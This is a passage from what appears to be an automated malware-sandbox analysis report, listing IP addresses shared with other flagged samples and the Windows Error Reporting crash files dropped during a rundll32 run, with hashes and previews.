                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        aVFOmbW2t7.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        gxJ83rJkgw.msiGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        yR4AxlwcWJ.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        BsyK7FB5DQ.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        SGfGZT66wD.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        uT9rwkGATJ.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        XK1PLPuwjL.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        pHEiqE9toa.msiGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        SecuriteInfo.com.W32.AIDetect.malware2.24481.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        vH0SHswvrb.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        NM0NyvZi8O.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        yOTzv1Qz0n.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        SWaTAV7EdD.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162

                                                                                                                        Dropped Files

                                                                                                                        No context

                                                                                                                        Created / dropped Files

                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_d4e7795f79114aeb9c4dc9cc69e25e6282339_82810a17_1874b820\Report.wer
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):12044
                                                                                                                        Entropy (8bit):3.765368455363511
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:0YuiJ0oXAHBUZMX4jed+x/u7sAwS274It7cJ:MinXoBUZMX4je8/u7sAwX4It7cJ
                                                                                                                        MD5:316CE6E876A182906C00DD2AD8F35040
                                                                                                                        SHA1:54AD11020F6730D0C756C5682E1BAEA55AE1F317
                                                                                                                        SHA-256:74EA72682FCB32B1165308196313E62BADE799EF2947E6D132D5A0D077219B19
                                                                                                                        SHA-512:749DD024BDC05C4918700FCF5740173D68F7FCEF20A4C56BCFF2D894123A628A78AF6B8103512056FBBEF378828B4AAEA3F757FA297DF91C155835C7FD19E77C
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.6.5.4.6.8.2.6.1.5.0.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.6.5.4.7.5.6.0.5.2.3.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.2.d.3.f.3.5.-.4.3.8.7.-.4.f.e.d.-.b.7.a.f.-.7.6.8.4.9.9.3.f.7.a.9.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.0.4.5.a.6.7.-.2.2.2.e.-.4.c.7.2.-.b.b.e.c.-.0.8.9.b.4.0.8.1.c.f.f.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.0.-.0.0.0.1.-.0.0.1.b.-.d.a.8.9.-.2.e.6.0.f.0.b.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_d4e7795f79114aeb9c4dc9cc69e25e6282339_82810a17_19a08827\Report.wer
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):12246
                                                                                                                        Entropy (8bit):3.765114618947458
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:ogaPiW0oX7HBUZMX4jed+j/u7sSS274It7cl:oJPiQXbBUZMX4jeO/u7sSX4It7cl
                                                                                                                        MD5:9CF8099E09C39847EFFF6FB7B70CEA33
                                                                                                                        SHA1:16B081768605B3C60E9DBF23A1646EBDF70337E0
                                                                                                                        SHA-256:D780C3F704283D57B71AE6362A0F6095E72DEDC4D08062E15094DF7FA1DAD471
                                                                                                                        SHA-512:F9873C535120F8E9BEF91F26B93B9251BD6F06F506E7D53E5EDDAE3E23AE04674686E39BD8BB186632AFF0A43717117E4F61818502AE49E938D546F5FA34EE37
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.6.5.4.7.9.9.9.8.3.1.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.6.5.4.9.3.9.0.4.4.8.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.1.d.e.5.4.7.-.b.d.c.0.-.4.a.7.4.-.9.0.f.e.-.4.f.e.1.f.8.d.b.f.f.b.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.e.9.a.1.f.8.-.8.2.c.a.-.4.a.c.0.-.9.c.1.f.-.0.4.d.d.4.9.8.8.b.9.8.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.0.-.0.0.0.1.-.0.0.1.b.-.f.8.7.1.-.3.6.6.7.f.0.b.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_d4e7795f79114aeb9c4dc9cc69e25e6282339_82810a17_1be8e7ac\Report.wer
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):12040
                                                                                                                        Entropy (8bit):3.7654289890935924
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:43iu0oX/HBUZMX4jed+x/u7sAwS274It7c/V:IiYX/BUZMX4je8/u7sAwX4It7c/V
                                                                                                                        MD5:47234B5A061C3D57518C75D012598E15
                                                                                                                        SHA1:8054E955AA6274E52832CECAC7BF98AB2AAC4A3E
                                                                                                                        SHA-256:BF44ADFD50F9CC39C25CC5B4642FD4EE5C007226F9AEDC5BBCA7FBA5DDBF6E4F
                                                                                                                        SHA-512:273E8DA585B81F6C6468E2BFFE4E452420D55F06597B6BE6F59747DB2FB96326B7C015A610D4D5A5B1F663593E3398E04C118600B7A5838156B1A568928CE7C6
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.6.5.4.7.5.0.8.9.8.8.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.6.5.4.8.8.7.3.0.5.2.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.9.5.e.6.6.3.-.8.9.1.b.-.4.5.3.4.-.a.c.6.0.-.b.9.b.2.2.c.2.8.0.c.a.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.a.7.1.d.2.7.-.d.c.2.f.-.4.e.0.1.-.a.e.c.e.-.3.b.4.9.0.b.5.1.3.6.2.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.5.4.-.0.0.0.1.-.0.0.1.b.-.2.7.a.b.-.4.b.6.2.f.0.b.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EDD.tmp.dmp
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Oct 11 22:37:50 2021, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):35838
                                                                                                                        Entropy (8bit):2.3956337648230916
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:zRpsH1iJ4InP5sfRuvUM+sOI36GDZ69CA4nxZN5knmhpIRY:dCkiInERYN+i6G0s1nF5kmc2
                                                                                                                        MD5:6314F249ADC86966FA67E57AE5C44922
                                                                                                                        SHA1:FFCAA1E89BAD579997BE419D71AA5F670200CD69
                                                                                                                        SHA-256:39A76F75342336856B50BBC0B977FBE57722A50B0BD0008499FBBC2A0B263C10
                                                                                                                        SHA-512:95B2148C5D3E31169DD1EBF64FACE7B4728DB4473EA9EC225A992B4BFD640E8E9C29393C9BDE50C99E9EAA94FB45EAA11BECFCC3CF2DE1063EDA9ACA9EA02DBB
                                                                                                                        Malicious:false
                                                                                                                        Preview: MDMP....... .........da...................U...........B..............GenuineIntelW...........T...........T.da"............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER270C.tmp.WERInternalMetadata.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8404
                                                                                                                        Entropy (8bit):3.698373923142492
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNi/j/6ZCy6YoDz6Tofg4dgmf8zSNz+prz89bDdsf0Bm:RrlsNiL/6oy6YCz6Tofg4dgmf8zSNjDk
                                                                                                                        MD5:D9504C279DAD3BB36B90B2ABB8BD6024
                                                                                                                        SHA1:8F897066FFB317B3CB6FE7CEDDCD657ABEFA0AD2
                                                                                                                        SHA-256:10A8657425ED12843DE5D88E4AC5FB228E04E30FC2285B5ABFAB0644D4F5FDED
                                                                                                                        SHA-512:1E599A129E128BDA89BBD6B4D4EBB20D56F4B4C3576399CFAF5B5EA8B4227ECE0156F047B9B628EA4091B4D3D829501B68118A87EA09EC46B4ECCE0E714F16F8
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.2.<./.P.i.d.>.......
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER29CC.tmp.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4771
                                                                                                                        Entropy (8bit):4.4859311182693515
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsdNJgtWI9jZVWSC8B2+8fm8M4JCdsTMF3+q8vjsTJO4SrSWd:uITf9EqSN07JNmKiJODWWd
                                                                                                                        MD5:14148F5D29C531D9A2DAB8BE378319B4
                                                                                                                        SHA1:2555ADA459F857D0F04C818ED0FA3523FBAEDA54
                                                                                                                        SHA-256:345133599386F0C3CD20ADF62510BA963E25DC1EE938691229F2E011F02CCF15
                                                                                                                        SHA-512:FDC853B50B28C8C90540AB31EBB67DE00BA0BEBE28A69CE469CCECE120487E62648DBF600DFC5F3F58211436306E7276FB12B579879897A84E1DD82E612446B0
                                                                                                                        Malicious:false
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1205748" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER398A.tmp.dmp
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Oct 11 22:37:57 2021, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):34760
                                                                                                                        Entropy (8bit):2.413605188260289
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:NICEknpSR00ugBtrvUM+sOI36FDZuzLNR2GK0KHnIZ1S1:PEPTN+i6FknX2GQIZ1C
                                                                                                                        MD5:FE3A9A57895A11BBDE379864BD34A1AA
                                                                                                                        SHA1:4660CCA0FFEDA2D9F0CC371B0E756BEBEE1E59CA
                                                                                                                        SHA-256:D3DAFB26C47511DD9A99713F077D9D3503749D9A128772ED3BCE2381FAD98C2B
                                                                                                                        SHA-512:5BF3A8825B1CBFB3F54916D2BE008CEC447763A16AB6A130FD3A78496E6D3DB5C9239FCEF211919354E6B78A3070072128C6A646F42403F0935A44ADB14B951E
                                                                                                                        Malicious:false
                                                                                                                        Preview: MDMP....... ........da...................U...........B..............GenuineIntelW...........T.......T...X.da!............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4543.tmp.WERInternalMetadata.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8412
                                                                                                                        Entropy (8bit):3.6972167795220234
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNiV36p6Yo76njOxp2+Pgmf8zSNz+pry89bLFsflZm:RrlsNiF6p6YU6axp2+Pgmf8zSNcLefy
                                                                                                                        MD5:76872B4F10DAB5548F7C5A90D51D5856
                                                                                                                        SHA1:09F65EB354956B8BDF85D560CB00855480EDA67B
                                                                                                                        SHA-256:7590A90E442F73573110BB00A58EC1D1B8B6E6A7F8C43CA37ECB25682A052922
                                                                                                                        SHA-512:8E63F1986DE67951325919E86C1A72F463AAD58723FE2E3710743EC271304908CF6D0C12B2CF3E2C6AF141782DC7BF36C68EC556A88DC3E01F000761D828CFCC
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.6.4.<./.P.i.d.>.......
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A83.tmp.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4771
                                                                                                                        Entropy (8bit):4.486599306136513
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsdNJgtWI9jZVWSC8B2r8fm8M4JCdsTMFl+q8vjsTh4SrSh6d:uITf9EqSN0IJNoKihDWh6d
                                                                                                                        MD5:F5119CC37CD940B95701B555B8405D56
                                                                                                                        SHA1:0F6AEC842D402C511BC033B95CDDE4B721F845CA
                                                                                                                        SHA-256:7B59F212C271180A12BD3B2F239E245B604E7BE9F2F6D4BDD729106A8E0E63E5
                                                                                                                        SHA-512:CAF3A254182B3FA64D7552562B9144A51D49A778C28225E64364D84C9B46F065861BF8E23F693BBCA769AB0D02137C69AB3B75B120D2C2582A245C0804917952
                                                                                                                        Malicious:false
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1205748" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4CB4.tmp.dmp
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Oct 11 22:38:06 2021, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):36016
                                                                                                                        Entropy (8bit):2.4897777598497166
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:xC0HXLDCwswpbRb3TZO2ODjUyrcFl7yuQM8BXEZniQcd9eq:s0771b1WUyrcPSM8Biinyq
                                                                                                                        MD5:559FD5E2D54239F3AF7994402E1F225A
                                                                                                                        SHA1:6F975E163EC0244D6973DCF1058DC318A990BAAF
                                                                                                                        SHA-256:4E9B64C1A7891E3469C235B9E4F92693B6D9451B09FE8BB64D09FA8CFDA9EF47
